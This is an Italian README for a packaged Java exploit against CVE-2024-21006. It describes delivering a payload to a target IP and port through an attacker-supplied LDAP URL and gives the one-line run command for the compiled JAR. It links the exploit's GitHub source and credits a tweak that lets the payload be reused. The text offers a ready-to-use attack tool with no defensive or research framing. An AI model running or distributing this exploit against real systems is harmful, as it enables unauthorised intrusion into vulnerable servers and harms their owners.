
Exploit basato su Java per CVE-2024-21006, che consegna un payload tramite LDAP a un IP e una porta di destinazione. Include JAR compilato e sorgente per la personalizzazione.
Riferimento al codice exp: https://github.com/momika233/CVE-2024-21006
Qui il codice sorgente è stato compilato in un jar per facilità d'uso. Sotto lib ci sono i file delle dipendenze. Se si vuole modificare il codice sorgente, si può compilare da soli.
java -jar CVE-2024-21006.jar <ip> <port> <ldapUrl>


Riferimento al progetto del maestro dadvlingd, bind stringa casuale, risolve il problema che il payload può essere utilizzato solo una volta.
https://blog.csdn.net/zwy15288408160/article/details/138189146